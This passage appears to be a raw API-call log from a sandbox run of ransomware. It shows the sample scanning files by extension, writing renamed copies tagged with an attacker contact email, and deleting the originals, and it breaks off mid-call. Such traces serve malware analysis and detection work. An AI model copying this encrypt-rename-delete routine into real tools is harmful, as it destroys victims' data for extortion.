[0178.941] lstrlenW (lpString=".1cd") returned 4 [0178.941] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0178.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0178.941] lstrlenW (lpString=".jpg") returned 4 [0178.941] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0178.941] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.941] lstrlenW (lpString="boxed-split.avi") returned 15 [0178.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0178.941] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=84190) returned 1 [0178.941] CloseHandle (hObject=0x344) returned 1 [0178.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0178.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0178.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0178.942] lstrlenW (lpString=".doc") returned 4 [0178.942] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0178.942] lstrlenW (lpString=".docx") returned 5 [0178.942] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0178.942] lstrlenW (lpString=".pdf") returned 4 [0178.942] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0178.942] lstrlenW (lpString=".xls") returned 4 [0178.942] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0178.942] lstrlenW (lpString=".xlsx") returned 5 [0178.942] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0178.942] lstrlenW (lpString=".ppt") returned 4 [0178.942] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0178.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0178.942] lstrlenW (lpString=".zip") returned 4 [0178.942] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0178.942] lstrlenW (lpString=".rar") returned 4 [0178.942] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0178.942] lstrlenW (lpString=".bz2") returned 4 [0178.942] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0178.943] lstrlenW (lpString=".7z") returned 3 [0178.943] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0178.943] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.943] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.956] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.956] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.978] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.979] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.980] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.980] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.981] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.981] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.982] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.982] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.983] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.983] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.988] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.989] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.989] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.990] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.990] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.991] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.991] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.992] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.992] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.993] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.993] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.994] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.994] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.995] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.995] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.996] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.996] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.997] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.997] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.998] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.998] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.998] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.999] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0178.999] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.000] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.000] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.001] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.001] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.406] Sleep (dwMilliseconds=0x64) [0179.694] Sleep (dwMilliseconds=0x64) [0179.983] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0179.984] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.984] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0179.985] GetLastError () returned 0x0 [0179.985] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x18b0, lpOverlapped=0x0) returned 1 [0180.054] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x18c0, lpOverlapped=0x0) returned 1 [0180.055] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0180.055] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0180.056] SetEndOfFile (hFile=0x374) returned 1 [0180.056] CloseHandle (hObject=0x374) returned 1 [0180.056] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0180.056] SetEndOfFile (hFile=0x370) returned 1 [0180.057] CloseHandle (hObject=0x370) returned 1 [0180.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0180.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf")) returned 1 [0180.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.058] lstrlenW (lpString=".doc") returned 4 [0180.058] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0180.058] lstrlenW (lpString=".docx") returned 5 [0180.058] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0180.058] lstrlenW (lpString=".pdf") returned 4 [0180.058] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0180.058] lstrlenW (lpString=".xls") returned 4 [0180.058] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0180.058] lstrlenW (lpString=".xlsx") returned 5 [0180.058] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0180.058] lstrlenW (lpString=".ppt") returned 4 [0180.058] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0180.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.058] lstrlenW (lpString=".zip") returned 4 [0180.058] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0180.058] lstrlenW (lpString=".rar") returned 4 [0180.058] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0180.058] lstrlenW (lpString=".bz2") returned 4 [0180.058] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0180.058] lstrlenW (lpString=".7z") returned 3 [0180.058] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0180.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.059] lstrlenW (lpString=".dbf") returned 4 [0180.059] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.059] lstrlenW (lpString=".1cd") returned 4 [0180.059] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.059] lstrlenW (lpString=".jpg") returned 4 [0180.059] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.059] lstrlenW (lpString=".doc") returned 4 [0180.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString=".docx") returned 5 [0180.059] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0180.059] lstrlenW (lpString=".pdf") returned 4 [0180.059] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString=".xls") returned 4 [0180.059] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0180.059] lstrlenW (lpString=".xlsx") returned 5 [0180.059] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0180.059] lstrlenW (lpString=".ppt") returned 4 [0180.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.059] lstrlenW (lpString=".zip") returned 4 [0180.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0180.059] lstrlenW (lpString=".rar") returned 4 [0180.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString=".bz2") returned 4 [0180.059] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0180.059] lstrlenW (lpString=".7z") returned 3 [0180.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0180.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.060] lstrlenW (lpString=".dbf") returned 4 [0180.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0180.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.060] lstrlenW (lpString=".1cd") returned 4 [0180.060] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0180.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF") returned 68 [0180.060] lstrlenW (lpString=".jpg") returned 4 [0180.060] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0180.060] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0180.060] lstrlenW (lpString="J0105320.WMF") returned 12 [0180.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0180.061] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=2020) returned 1 [0180.061] CloseHandle (hObject=0x370) returned 1 [0180.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf")) returned 0x220 [0180.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0180.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0180.061] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0180.061] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0180.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0180.062] GetLastError () returned 0x0 [0180.062] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x7e4, lpOverlapped=0x0) returned 1 [0181.322] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x7f0, lpOverlapped=0x0) returned 1 [0181.323] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.323] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.323] SetEndOfFile (hFile=0x374) returned 1 [0181.323] CloseHandle (hObject=0x374) returned 1 [0181.323] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.324] SetEndOfFile (hFile=0x370) returned 1 [0181.324] CloseHandle (hObject=0x370) returned 1 [0181.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.325] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf")) returned 1 [0181.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.325] lstrlenW (lpString=".doc") returned 4 [0181.325] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.325] lstrlenW (lpString=".docx") returned 5 [0181.325] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0181.325] lstrlenW (lpString=".pdf") returned 4 [0181.325] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.325] lstrlenW (lpString=".xls") returned 4 [0181.325] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.325] lstrlenW (lpString=".xlsx") returned 5 [0181.325] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0181.325] lstrlenW (lpString=".ppt") returned 4 [0181.326] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.326] lstrlenW (lpString=".zip") returned 4 [0181.326] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.326] lstrlenW (lpString=".rar") returned 4 [0181.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.326] lstrlenW (lpString=".bz2") returned 4 [0181.326] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.326] lstrlenW (lpString=".7z") returned 3 [0181.326] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.326] lstrlenW (lpString=".dbf") returned 4 [0181.326] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.326] lstrlenW (lpString=".1cd") returned 4 [0181.326] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.327] lstrlenW (lpString=".jpg") returned 4 [0181.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.327] lstrlenW (lpString=".doc") returned 4 [0181.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.327] lstrlenW (lpString=".docx") returned 5 [0181.327] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0181.327] lstrlenW (lpString=".pdf") returned 4 [0181.327] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.327] lstrlenW (lpString=".xls") returned 4 [0181.327] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.327] lstrlenW (lpString=".xlsx") returned 5 [0181.327] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0181.327] lstrlenW (lpString=".ppt") returned 4 [0181.327] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.327] lstrlenW (lpString=".zip") returned 4 [0181.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.327] lstrlenW (lpString=".rar") returned 4 [0181.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.327] lstrlenW (lpString=".bz2") returned 4 [0181.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.327] lstrlenW (lpString=".7z") returned 3 [0181.327] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.327] lstrlenW (lpString=".dbf") returned 4 [0181.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.328] lstrlenW (lpString=".1cd") returned 4 [0181.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF") returned 68 [0181.328] lstrlenW (lpString=".jpg") returned 4 [0181.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.328] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.328] lstrlenW (lpString="J0105332.WMF") returned 12 [0181.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.329] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2e9ff14 | out: lpFileSize=0x2e9ff14*=10508) returned 1 [0181.329] CloseHandle (hObject=0x370) returned 1 [0181.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf")) returned 0x220 [0181.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0181.329] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.329] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0181.330] GetLastError () returned 0x0 [0181.330] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x290c, lpOverlapped=0x0) returned 1 [0181.415] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2910, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2910, lpOverlapped=0x0) returned 1 [0181.416] ReadFile (in: hFile=0x370, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.417] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0181.417] SetEndOfFile (hFile=0x374) returned 1 [0181.417] CloseHandle (hObject=0x374) returned 1 [0181.417] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.417] SetEndOfFile (hFile=0x370) returned 1 [0181.418] CloseHandle (hObject=0x370) returned 1 [0181.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.418] DeleteFileW (lpFileName="C:\\Program 